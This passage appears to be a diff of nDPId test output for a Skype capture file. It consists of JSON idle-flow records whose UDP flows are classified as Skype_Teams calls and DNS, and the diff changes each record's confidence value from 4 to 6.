{"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.13","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970682972,"flow_last_seen":1431970682972,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.173","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970670941,"flow_last_seen":1431970670941,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.149","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970660848,"flow_last_seen":1431970660848,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.160","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970664878,"flow_last_seen":1431970664878,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.44","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.170","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970681960,"flow_last_seen":1431970681960,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.40","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.28","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.15","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.27","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.34","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.171","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.159","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970660848,"flow_last_seen":1431970660848,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970679839,"flow_last_seen":1431970706169,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60413,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431970636300,"flow_last_seen":1431970662705,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":50055,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.43","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.19","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.42","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.13","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970682972,"flow_last_seen":1431970682972,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.173","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970670941,"flow_last_seen":1431970670941,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.149","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970660848,"flow_last_seen":1431970660848,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.160","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970664878,"flow_last_seen":1431970664878,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.44","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.170","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
